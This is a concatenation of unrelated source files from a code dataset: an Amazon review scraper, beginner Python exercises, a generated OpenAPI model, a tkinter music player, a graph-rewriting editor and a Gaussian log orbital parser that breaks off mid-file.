response.xpath(self.review_urlXpath)[0].extract()\n url = self.baseUrl + reviewUrl\n yield Request(url=url,callback=self.parse_review, dont_filter=True,meta = {'dont_redirect': True, \"handle_httpstatus_list\" : [301, 302, 303]})\n\n\n def parse_review(self,response):\n \"\"\"Parse each review\"\"\"\n #Get the Review List\n data = response.css(self.dataCSS)\n #Get the Name\n reviewers = data.css(self.reviewerCSS)\n #Get the Review Title\n titles = data.css(self.titleCSS)\n # Get the Ratings\n ratings = data.css(self.rateCSS)\n # Get the dates\n dates = data.css(self.dateCSS)\n # Get the users Comments\n comments = data.css('.review-text')\n\n count = 0\n #length = len(title)\n\n for title in titles:\n item = ReviewItem()\n\n Reviewer = reviewers[count].xpath(\".//text()\").extract()\n Reviewer = self.cleanText(self.parseText(self.listToStr(Reviewer)))\n\n Rate = ratings[count].xpath(\".//text()\").extract()\n Rate = self.cleanText(self.parseText(self.listToStr(Rate)))\n\n Date = dates[count].xpath(\".//text()\").extract()\n Date = self.cleanText(self.parseText(self.listToStr(Date)))\n\n Title = titles[count].xpath(\".//text()\").extract()\n Title = self.cleanText(self.parseText(self.listToStr(Title)))\n\n Content = comments[count].xpath(\".//text()\").extract()\n Content = self.cleanText(self.parseText(self.listToStr(Content)))\n\n item['asin'] = self.asin\n item['reviewer'] = Reviewer\n item['rate'] = Rate\n item['date'] = Date\n item['title'] = Title\n item['content'] = Content\n\n yield item\n count +=1\n\n #if count>=length:\n # after finishing the last review, go to the next page\n pagination_link = response.xpath('//*[@id=\"cm_cr-pagination_bar\"]/ul/li[2]/a/@href')[0].extract()\n pagination_url = self.baseUrl + pagination_link\n yield Request(url=pagination_url,callback=self.parse_review, dont_filter=True)\n\n #Methods to clean and format text to make it easier to work with later\n def listToStr(self,MyList):\n dumm = \"\"\n MyList = [i.encode('utf-8') for i in MyList]\n for i in MyList:dumm = \"{0}{1}\".format(dumm,i)\n return dumm\n \n def parseText(self, str):\n soup = BeautifulSoup(str, 'html.parser')\n return re.sub(\" +|\\\\n|\\\\r|\\\\t|\\\\0|\\\\x0b|\\\\xa0\",' ',soup.get_text()).strip()\n \n def cleanText(self,text):\n soup = BeautifulSoup(text,'html.parser')\n text = soup.get_text()\n text = re.sub(\"( +|\\\\n|\\\\r|\\\\t|\\\\0|\\\\x0b|\\\\xa0|\\\\xbb|\\\\xab)+\",' ',text).strip()\n return text\n","sub_path":"amzproduct/amzproduct/spiders/reviewSpider.py","file_name":"reviewSpider.py","file_ext":"py","file_size_in_byte":5213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"259475968","text":"\"\"\"\nCrie um algoritmo que solicite 3 valores que representarão os lados de um triângulo.\nConsidere que não importa a ordem que serão fornecidos os valores,\npodendo ser fornecido primeiro a hipotenusa e depois os catetos, ou primeiro os catetos e depois a hipotenusa, etc.\nCrie também uma função que recebe o vetor e retorna se os lados informados formam um triângulo retângulo.\nVocê pode utilizar o teorema de Pitágoras para auxiliar na resolução: hiponusa2 = cateto12 + cateto22.\n\"\"\"\n\ndef hipt(vetor,t):\n if vetor[0] > vetor[1] and vetor[0] > vetor[2]:\n hipo =vetor[0]\n vet1 = vetor[1]\n vet2 = vetor[2]\n elif vetor[1] > vetor[0] and vetor[1] > vetor[2]:\n hipo = vetor[1]\n vet1 = vetor[0]\n vet2 = vetor[2]\n else:\n hipo = vetor[2]\n vet1 = vetor[0]\n vet2 = vetor[1]\n\n if (vet1**2) + (vet2**2) == (hipo**2):\n print('É um triângulo retângulo')\n else:\n print('Não é um triângulo retângulo')\n\n\n\n\n\n\ntam = 3\nv = [0]*tam\nfor i in range(tam):\n v[i] = int(input('Informe o valor dos lados de um triangulo: '))\n\n\nhipt(v, tam)\n","sub_path":"Exercicios_basicos/ppe/listaExercicio/ex04.py","file_name":"ex04.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85800510","text":"# coding: utf-8\n\n\"\"\"\n madana-api\n\n

API Quickstart Guide

This documentation contains a Quickstart Guide, a few sample clients for download and information about the available endpoints and DataTypes

The MADANA Explorer can be used to verify the interactions with the API

Internal use only. For more information visit www.madana.io



# noqa: E501\n\n The version of the OpenAPI document: 0.4.12\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom madana_sampleclient_python.configuration import Configuration\n\n\nclass JsonDatasetInfo(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'signature': 'str',\n 'size': 'str',\n 'hash': 'str',\n 'creationdate': 'str',\n 'fingerprint': 'str'\n }\n\n attribute_map = {\n 'signature': 'signature',\n 'size': 'size',\n 'hash': 'hash',\n 'creationdate': 'creationdate',\n 'fingerprint': 'fingerprint'\n }\n\n def __init__(self, signature=None, size=None, hash=None, creationdate=None, fingerprint=None, local_vars_configuration=None): # noqa: E501\n \"\"\"JsonDatasetInfo - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._signature = None\n self._size = None\n self._hash = None\n self._creationdate = None\n self._fingerprint = None\n self.discriminator = None\n\n if signature is not None:\n self.signature = signature\n if size is not None:\n self.size = size\n if hash is not None:\n self.hash = hash\n if creationdate is not None:\n self.creationdate = creationdate\n if fingerprint is not None:\n self.fingerprint = fingerprint\n\n @property\n def signature(self):\n \"\"\"Gets the signature of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The signature of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._signature\n\n @signature.setter\n def signature(self, signature):\n \"\"\"Sets the signature of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param signature: The signature of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._signature = signature\n\n @property\n def size(self):\n \"\"\"Gets the size of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The size of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._size\n\n @size.setter\n def size(self, size):\n \"\"\"Sets the size of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param size: The size of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._size = size\n\n @property\n def hash(self):\n \"\"\"Gets the hash of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The hash of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._hash\n\n @hash.setter\n def hash(self, hash):\n \"\"\"Sets the hash of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param hash: The hash of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._hash = hash\n\n @property\n def creationdate(self):\n \"\"\"Gets the creationdate of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The creationdate of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._creationdate\n\n @creationdate.setter\n def creationdate(self, creationdate):\n \"\"\"Sets the creationdate of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param creationdate: The creationdate of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._creationdate = creationdate\n\n @property\n def fingerprint(self):\n \"\"\"Gets the fingerprint of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The fingerprint of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._fingerprint\n\n @fingerprint.setter\n def fingerprint(self, fingerprint):\n \"\"\"Sets the fingerprint of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param fingerprint: The fingerprint of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._fingerprint = fingerprint\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, JsonDatasetInfo):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, JsonDatasetInfo):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"madana_sampleclient_python/models/json_dataset_info.py","file_name":"json_dataset_info.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650437753","text":"import pandas as pd\nimport psycopg2 as pg\nimport pandas.io.sql as psql\nimport os\nimport time\nfrom datetime import datetime\n\nlogfile_dir=\"/home/infografico/coopecg/log/\"\nclass pypo():\n def __init__(self):\n self.conn = pg.connect(\"dbname=postgres host=172.16.1.101 port=5432 user=postgres password=infografico\")\n\n def run_sql(self, mquery):\n resultado = psql.read_sql(mquery, self.conn)\n return resultado\n\n def log_write(New_String):\n if not(os.path.exists(logfile_dir)):\n os.mkdir(logfile_dir)\n filename = str(datetime.now().strftime('%d%m%Y'))\n log_time = str(datetime.now().strftime('%d%m%Y %H:%M:%S') +': ')\n with open(logfile_dir + '/' + filename , 'a+') as fh1:\n fh1.write(log_time + New_String +'\\n')\n time.sleep(0.1)\n\n def file_count(file_):\n with open(file_) as f:\n count = sum(1 for _ in f)\n return count\n\n def data_write(New_String):\n if not(os.path.exists(datafile_dir)):\n os.mkdir(datafile_dir)\n log_time = str(datetime.now().strftime('%d%m%Y %H:%M:%S'))\n with open(datafile_dir + '/' + data_filename , 'a+') as fh2:\n fh2.write(log_time + ',' + New_String +'\\n')\n time.sleep(0.1)\n","sub_path":"src/pypo.py","file_name":"pypo.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"152093323","text":"'''\nCreated on May 15, 2014\n\n@author: john\n'''\n\nfrom cs1lib import *\nfrom quicksort import sort\nfrom cities import read_file, compare_objects_population\nfrom time import clock\n\nWINDOW_WIDTH = 720\nWINDOW_HIGHT = 360\nPIXLES_PER_LATITUDE = WINDOW_HIGHT / 180.0\nPIXLES_PER_LONGITUDE = WINDOW_WIDTH / 360.0\n\nNUMBER_OF_CITIES_SHOWN = 50\n\ncities = read_file()\nsort(cities, compare_objects_population)\n\ndef main():\n \n set_fill_color(1.0, 0.0, 0.0)\n enable_stroke()\n clear()\n # load and draw image\n image = load_image(\"world.png\")\n draw_image(image, 0, 0)\n \n cities_drawn = []\n \n for city in cities[: NUMBER_OF_CITIES_SHOWN + 1]:\n blink = True\n for i in range(2*3 + 1):\n \n clear()\n # load and draw image\n image = load_image(\"world.png\")\n draw_image(image, 0, 0)\n \n # Redraw done cities\n for drawn_city in cities_drawn:\n drawn_city.draw(PIXLES_PER_LONGITUDE, PIXLES_PER_LATITUDE) \n \n # Draw new city\n city.draw(PIXLES_PER_LONGITUDE, PIXLES_PER_LATITUDE, True, blink)\n \n request_redraw()\n # Toggle blink\n blink = not blink\n # Check if window is closed\n if window_closed():\n break\n sleep(0.1)\n # Add the city now done to the list of done cities\n cities_drawn.append(city)\n if window_closed():\n break\n #sleep(0.01)\n \n \n \n clear()\n # load and draw image\n image = load_image(\"world.png\")\n draw_image(image, 0, 0)\n \n # Redraw done cities\n for drawn_city in cities_drawn:\n drawn_city.draw(PIXLES_PER_LONGITUDE, PIXLES_PER_LATITUDE)\n \n\nstart_graphics(main, \"30 Most Populous Cities\", WINDOW_WIDTH, WINDOW_HIGHT, True)","sub_path":"Lab 3/visualize_cities.py","file_name":"visualize_cities.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"95900768","text":"from pygame import mixer\nfrom tkinter import *\nfrom PIL import Image\nfrom PIL import ImageTk\nimport os\nimport random\nimport threading\nimport sys\nfrom time import sleep\n\nclass Music_Player:\n def __init__(self):\n self.cur_path = os.getcwd()+'\\\\downloads'\n self.button_src = os.getcwd()+'\\\\button'\n self.filelist = []\n self.playlist = []\n self.ispause = False\n self.loop_play_times = 0\n self.isloop_play = False\n self.count = 0\n self.is_next_song = False\n \n self.israndom_play = False\n self.nowplaying = str()\n \n mixer.init()\n self.window = Tk()\n self.window.geometry(\"1200x800\")\n self.window.title(\"mp3 player\")\n self.window.configure(background = \"#367B34\")\n \n self.pause_png = Image.open(self.button_src+\"\\\\pause.png\" )\n self.pause_png = ImageTk.PhotoImage(self.pause_png)\n self.next_song_png = Image.open(self.button_src+\"\\\\next_song.png\")\n self.next_song_png = ImageTk.PhotoImage(self.next_song_png)\n self.previous_song_png = Image.open(self.button_src+\"\\\\previous_song.png\")\n self.previous_song_png = ImageTk.PhotoImage(self.previous_song_png)\n self.play_png = Image.open(self.button_src+\"\\\\play.png\")\n self.play_png = ImageTk.PhotoImage(self.play_png)\n self.loop_play_png = Image.open(self.button_src+\"\\\\loop_play.png\" )\n self.loop_play_png = ImageTk.PhotoImage(self.loop_play_png)\n self.random_play_png = Image.open(self.button_src+\"\\\\random_play.png\" )\n self.random_play_png = ImageTk.PhotoImage(self.random_play_png)\n \n frame1 = Frame(self.window, bg=\"#367B34\")\n frame1.pack()\n \n file_tree = os.walk(self.cur_path)\n #print(file_tree)\n for i,j,files in file_tree:\n self.filelist = files\n \n print(self.filelist)\n \n for file_index in range(len(self.filelist)):\n self.filelist[file_index] = 'downloads\\\\'+ self.filelist[file_index]\n \n self.playlist = self.filelist+[]\n #print(self.filelist)\n \n \"\"\"self.pause_text = StringVar()\n self.pause_text.set(\"play\" if self.ispause else \"pause\")\n self.loop_text = StringVar()\n self.loop_text.set(\"single play\" if self.isloop_play else \"loop play\")\n self.random_text = StringVar()\n self.random_text.set(\"order play\" if self.israndom_play else \"random play\")\n \"\"\"\n \n self.label_text = StringVar()\n self.volume = 30\n \n \n \n self.button1 = Button(frame1, image = self.pause_png , command = self.pause, bg=\"#367B34\")\n self.button1.grid(row = 0, column = 0, padx = 5, pady = 5)\n button2 = Button(frame1, image = self.loop_play_png , command = self.loop_play, bg=\"#367B34\")\n button2.grid(row = 0, column = 1, padx = 5, pady = 5)\n button3 = Button(frame1, image = self.random_play_png , command = self.random_play, bg=\"#367B34\")\n button3.grid(row = 0, column = 2, padx = 5, pady = 5)\n button4 = Button(frame1, image = self.next_song_png , command = self.next_song, bg=\"#367B34\")\n button4.grid(row = 0, column = 3, padx = 5, pady = 5)\n button5 = Button(frame1, image = self.previous_song_png , command = self.previous_song, bg=\"#367B34\")\n button5.grid(row = 0, column = 4, padx = 5, pady = 5)\n \n frame2 = Frame(self.window, bg=\"#367B34\")\n frame2.pack()\n label = Label(frame2,textvariable = self.label_text)\n label.pack()\n \n frame3 = Frame(self.window, bg=\"#367B34\")\n frame3.pack()\n valueBar = Scale(frame3,command = self.set_volume, from_= 0 , to = 100 , orient = \"horizontal\")\n valueBar.set(self.volume)\n valueBar.pack()\n \n mixer.music.load(self.playlist[self.count])\n mixer.music.set_volume(self.volume/100)\n mixer.music.play(loops = 0)\n self.nowplaying = self.playlist[self.count]\n self.label_text.set(self.nowplaying.replace(\"downloads\\\\\",\"\"))\n \n t = threading.Thread(target = self.play)\n t.setDaemon(True)\n t.start()\n \n self.window.protocol(\"WM_DELETE_WINDOW\",self.stop)\n self.window.mainloop()\n \n \n \n def decounter(self):\n if self.count == 0 and not self.isloop_play:\n self.count = len(self.playlist)-1\n \n elif self.isloop_play:\n self.count = 0\n \n else:\n self.count -= 1\n \n def counter(self):\n if self.count == len(self.playlist)-1 or self.isloop_play:\n self.count = 0\n else:\n self.count += 1\n \n def random_play(self):\n if not self.israndom_play:\n \n random.shuffle(self.playlist)\n self.label_text.set(self.nowplaying)\n self.israndom_play = True\n \n else:\n self.playlist = self.filelist\n self.count = self.playlist.index(self.nowplaying)\n self.israndom_play = False\n \n #self.random_text.set(\"order play\" if self.israndom_play else \"random play\")\n \n def pause(self):\n if self.is_next_song:\n self.is_next_song = False\n \n if not self.ispause:\n mixer.music.pause()\n self.ispause = True\n self.button1.configure(image = self.play_png)\n else:\n mixer.music.unpause()\n self.ispause = False\n self.button1.configure(image = self.pause_png)\n \n self.button1.configure(image = self.play_png if self.ispause else self.pause_png)\n \n \n def next_song(self):\n self.ispause = False\n self.button1.configure(image = self.play_png if self.ispause else self.pause_png)\n mixer.music.stop()\n self.counter()\n mixer.music.load(self.playlist[self.count])\n mixer.music.play(loops = 0)\n self.nowplaying = self.playlist[self.count]\n self.label_text.set(self.nowplaying.replace(\"downloads\\\\\",\"\"))\n \n def previous_song(self):\n self.ispause = False\n self.button1.configure(image = self.play_png if self.ispause else self.pause_png)\n mixer.music.stop()\n self.decounter()\n mixer.music.load(self.playlist[self.count])\n mixer.music.play(loops = 0)\n self.nowplaying = self.playlist[self.count]\n self.label_text.set(self.nowplaying.replace(\"downloads\\\\\",\"\"))\n \n def loop_play(self):\n if self.isloop_play:\n self.playlist = self.filelist\n self.count = self.playlist.index(self.nowplaying)\n self.isloop_play = False\n else:\n self.playlist = [self.nowplaying]\n self.isloop_play = True\n \n #self.loop_text.set(\"single play\" if self.isloop_play else \"loop play\")\n \n def set_volume(self,volume):\n mixer.music.set_volume(int(volume)/100)\n \n def stop(self):\n mixer.music.stop()\n self.window.destroy()\n sys.exit()\n \n def play(self):\n while True:\n if not mixer.music.get_busy() and not self.ispause:\n self.next_song()\n sleep(0.25)\n \nMusic_Player()\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"358248061","text":"'''\nYou are given a string and your task is to swap cases. In other words, convert all lowercase letters to uppercase letters and vice versa.\n\nFor Example:\n\nWww.HackerRank.com → wWW.hACKERrANK.COM\nPythonist 2 → pYTHONIST 2 \nFunction Description\n\nComplete the swap_case function in the editor below.\n\nswap_case has the following parameters:\n\nstring s: the string to modify\nReturns\n\nstring: the modified string\nInput Format\n\nA single line containing a string .\n\nConstraints\n\n\nSample Input 0\n\nHackerRank.com presents \"Pythonist 2\".\nSample Output 0\n\nhACKERrANK.COM PRESENTS \"pYTHONIST 2\".\nlink- https://www.hackerrank.com/challenges/swap-case/problem\n\n'''\n# print ''.join([i.lower() if i.isupper() else i.upper() for i in input()])\n# print(\"\".join(map(str.swapcase, input())))\ndef swap_case(s):\n st=\"\"\n for i in s:\n if i==i.upper():\n i=i.lower()\n else:\n i=i.upper()\n st+=i \n return st\n\nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)","sub_path":"10X/Python/Array/Swap_cASE.py","file_name":"Swap_cASE.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"233988245","text":"# \n# editor.py\n# \n# Author(s):\n# Matteo Spallanzani \n# \n# Copyright (c) 2020-2021 ETH Zurich.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# \n\nimport itertools\nimport tempfile\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom networkx.algorithms import bipartite\nimport networkx as nx\n\n# import graphs\n# import utils\n\nfrom .. import graphs\nfrom .. import grrules\nfrom .. import utils\n\n\n__FAILURE__ = False\n__SUCCESS__ = True\n\n\nCommit = namedtuple('Commit', ['rho', 'g', 'Gprime', 'nodes_dict'])\n\n\nclass History(object):\n\n def __init__(self, nx_graph, nodes_dict):\n self._nx_graph = nx_graph # keep track of the original object\n self._nodes_dict = nodes_dict\n self._undo = []\n self._redo = []\n\n def show(self):\n print(\"-- History --\")\n for i, commit in enumerate(self._undo):\n print(i, commit)\n\n def push(self, commit):\n self._undo.append(commit)\n self._redo.clear()\n\n def undo(self, n=1):\n for i in range(0, n):\n try:\n self._redo.append(self._undo.pop())\n except IndexError:\n print(\"Tried to undo {} steps, but history contained just {}. 'Undo' stack has been cleared.\".format(n, i))\n break\n\n def redo(self, n=1):\n for i in range(0, n):\n try:\n self._undo.append(self._redo.pop())\n except IndexError:\n print(\"Tried to redo {} steps, but history contained just {}. 'Redo' stack has been cleared.\".format(n, i))\n break\n\n def clear(self, force=False):\n\n if not force:\n confirmation = input(\"This action is not reversible. Are you sure that you want to delete all the history? [yes/NO]\")\n force = confirmation.lower() == 'yes'\n\n if force:\n self._undo.clear()\n self._redo.clear()\n\n\nclass Editor(object):\n\n def __init__(self, qlgraph, onlykernel=False, graphviz=False):\n\n self.qlgraph = qlgraph\n\n self._input_nodes = None\n self._output_nodes = None\n\n input_datanodes = {n for n, dp in nx.get_node_attributes(self.qlgraph.nx_graph, 'data_partition').items() if dp == graphs.DataPartition.INPUT}\n output_datanodes = {n for n, dp in nx.get_node_attributes(self.qlgraph.nx_graph, 'data_partition').items() if dp == graphs.DataPartition.OUTPUT}\n\n if onlykernel:\n\n input_opnodes = set(itertools.chain.from_iterable([set([s for s in self.qlgraph.nx_graph.successors(n)]) for n in input_datanodes]))\n output_opnodes = set(itertools.chain.from_iterable([set([p for p in self.qlgraph.nx_graph.predecessors(n)]) for n in output_datanodes]))\n\n self._input_nodes = input_opnodes\n self._output_nodes = output_opnodes\n\n G = bipartite.projected_graph(self.qlgraph.nx_graph, {n for n in self.qlgraph.nx_graph.nodes if self.qlgraph.nx_graph.nodes[n]['bipartite'] == graphs.Bipartite.KERNEL})\n\n else:\n\n self._input_nodes = input_datanodes\n self._output_nodes = output_datanodes\n\n G = self.qlgraph.nx_graph\n\n nodes_dict = {k: v for k, v in self.qlgraph.nodes_dict.items() if k in G.nodes}\n\n self._history = History(G, nodes_dict)\n self._in_session = False # put a lock on the history by preventing editing actions\n self._rho = None # current GRR\n self._graphviz = graphviz\n self._cache_dir = None\n\n @property\n def G(self):\n try:\n G = self._history._undo[-1].Gprime\n except IndexError:\n G = self._history._nx_graph\n return G\n\n @property\n def nodes_dict(self):\n try:\n nodes_dict = self._history._undo[-1].nodes_dict\n except IndexError:\n nodes_dict = self._history._nodes_dict\n return nodes_dict\n\n def startup(self):\n self._cache_dir = tempfile.TemporaryDirectory()\n import os\n print(\"Temporary cache directory created at {}\".format(os.path.abspath(self._cache_dir.name)))\n self._in_session = True\n\n def pause(self):\n self._in_session = False\n\n def resume(self):\n self._in_session = True\n\n def shutdown(self):\n self._rho = None\n self._in_session = False\n self._apply_changes_to_graph()\n self._cache_dir.cleanup()\n self._history.clear(force=True)\n\n def set_grr(self, rho):\n self._rho = rho\n\n def seek(self, **kwargs):\n\n if self._rho:\n gs = self._rho.seek(self.G, self.nodes_dict, **kwargs)\n else:\n gs = None\n print(\"No rule defined.\")\n\n return gs\n\n def edit(self, gs=None, **kwargs):\n\n if self._rho and self._in_session:\n\n if gs is None:\n gs = self.seek(**kwargs)\n\n for g in gs:\n\n try:\n G_new, nodes_dict_new = self._rho.apply(self.G, self.nodes_dict, g) # derivation\n self._history.push(Commit(self._rho, g, G_new, nodes_dict_new))\n status = __SUCCESS__\n\n except Exception as e:\n print(\"An issue arose while applying rule {} to graph <{}> at point: \".format(type(self._rho), self.G))\n for vH, vL in g.items():\n print(\"\\t\", vH, vL)\n print(e)\n status = __FAILURE__\n\n if (status == __SUCCESS__) and self._graphviz:\n self._take_snapshot()\n\n else:\n if self._rho is None:\n print(\"No rule defined for editor object <{}>.\".format(self))\n else:\n print(\"Editor object <{}> is not in an editing session.\".format(self))\n\n def add_io_handles(self):\n\n if isinstance(self.qlgraph, graphs.PyTorchGraph):\n self.startup()\n self.set_grr(grrules.AddInputNodeRule())\n self.edit(gs=self.seek(VIs=[[n] for n in self._input_nodes]))\n self.set_grr(grrules.AddOutputNodeRule())\n self.edit(gs=self.seek(VIs=[[n] for n in self._output_nodes]))\n self.pause()\n\n def _apply_changes_to_graph(self):\n\n self.qlgraph.nx_graph = self.G\n self.qlgraph.nodes_dict = self.nodes_dict\n\n def _take_snapshot(self):\n filename = datetime.now().strftime(\"%H:%M:%S_{}_{}\".format(len(self._history._undo), type(self._history._undo[-1].rho)))\n utils.draw_graph(self.G, self._cache_dir.name, filename) # take a snapshot of the edited graph\n\n# 1. label graph nodes (node label is usually computed as the aggregation of 1.partition and 2.type, but see COMMENT below)\n# 2. define a graph rewriting rule (GRR)\n# 3. 'discover' possible application points for the rules\n# 4. 'filter' the sequence of application points (possibly NOT automatic)\n# 5. 'apply' the rule to the filtered sequence of application points\n# - each pair (rule, application_point) is called a 'transform', and the resulting graph is called a 'derivation'\n# 6. 'generate_code' for the transformed graph\n# 7. 'import_network' from the transformed graph's file\n\n# [COMMENT] Steps 1 and 2 are usually designed in reversed order:\n# - the user first thinks to the rule\n# - then decides which \"pieces\" should be in the label\n# which \"ingredients\" did I use in the past to generate these labels? (my personal \"database/record\" of use cases)\n# - ONNX op type\n# - node scope\n\n","sub_path":"editing/graphs/editor/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29977374","text":"\"\"\"\r\n\r\nGiven an input gaussian log file, parse out the atomic coordinates and molecular orbitals.\r\n\r\nOutput:\r\n \r\n orbital table/matrix:\r\n Example:\r\n Molecular Orbital Coefficients:\r\n 1 2 3 4 5\r\n O O O O O\r\n Eigenvalues -- -1.36363 -1.17864 -1.15298 -1.11813 -1.11310\r\n 1 1 O 1S 0.25305 -0.05726 0.00090 0.56130 0.01346\r\n 2 1PX 0.18053 -0.02074 0.00605 0.11692 0.01466\r\n 3 1PY 0.14800 -0.00818 -0.00997 0.14767 -0.02255\r\n 4 1PZ 0.14746 -0.02153 0.00477 0.08341 0.02417\r\n 5 2 N 1S 0.78611 -0.03071 0.00727 0.01200 0.03001 \r\n\r\n \r\n molname_Molecular_orbitals.json: [\r\n {\r\n MO_number : int\r\n , occupied : bool\r\n , eigenvalue : float\r\n , atomic_contributions: [\r\n {\r\n atom_number : int\r\n , atom_symbol : str\r\n , atomic_orbitals : [\r\n orbital_symbol : str\r\n , energy : float\r\n ]\r\n },\r\n ...\r\n ]\r\n }\r\n , ...\r\n ]\r\n\r\n\r\n HOMO MO_number given by MO_number of last occupied MO\r\n LUMO MO_number given by HOMO MO_number + 1\r\n\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nfrom typing import Iterable, List\r\nimport re\r\nimport json\r\nimport argparse\r\n\r\nimport numpy as np\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\r\n \"-i\", \"--input-file\", dest=\"inputFile\", help=\"input gaussian log file to parse orbitals from\", type=str\r\n)\r\nparser.add_argument(\r\n \"--orbitals\", type=str, dest=\"orbitals\", help='string of comma separated values of the orbitals to extract. Values can be an integer or the string \"homo\" or \"lumo\". Leave blank to extract all orbitals or don\\'t pass this parameter.'\r\n)\r\n\r\nargs = parser.parse_args()\r\n\r\ninFile: str = args.inputFile\r\n\r\norbitals = args.orbitals\r\nif orbitals:\r\n orbitals = orbitals.split(\",\")\r\nelse:\r\n orbitals = [\"\"]\r\n\r\n\r\nmolName, _ = os.path.splitext(inFile)\r\n\r\n###########################\r\n### Read the input log file\r\n###########################\r\n\r\nwith open(inFile, \"r\") as ReadFile:\r\n fileContent: List[str] = list(ReadFile.readlines())\r\n\r\n##################################\r\n### Get list of orbital symmetries \r\n##################################\r\n\r\n### Natoms line regex\r\nstart_coords_pattern = re.compile(r\"Charge =\\s+\\d Multiplicity\")\r\n\r\noccupied_symm_lines: List[str] = []\r\nvirtual_symm_lines: List[str] = []\r\n\r\nstart_idx = None\r\nocc = None\r\nvirt = None\r\nMO_table_start_idx = None\r\nMO_table_end_idx = None\r\nstart_coords = False\r\natom_num = 1\r\n### {\"{atom_num}\" : [x,y,z]}\r\natomic_coords = {}\r\nfor idx, line in enumerate(fileContent):\r\n if \"Orbital symmetries:\" in line:\r\n start_idx = idx\r\n if start_idx:\r\n if \"Occupied\" in line:\r\n occ = True\r\n elif \"Virtual\" in line:\r\n occ = None\r\n virt = True\r\n if \"electronic state\" in line:\r\n end_idx = idx\r\n start_idx = None\r\n occ = None\r\n virt = None\r\n if occ:\r\n occupied_symm_lines.append(line.strip())\r\n elif virt:\r\n virtual_symm_lines.append(line.strip())\r\n\r\n elif start_coords:\r\n if line.strip() == \"\":\r\n start_coords = False\r\n else:\r\n atomic_coords[atom_num] = [float(x) for x in line.split()[1:]]\r\n atom_num += 1\r\n\r\n elif re.search(start_coords_pattern, line):\r\n start_coords = True\r\n\r\n elif 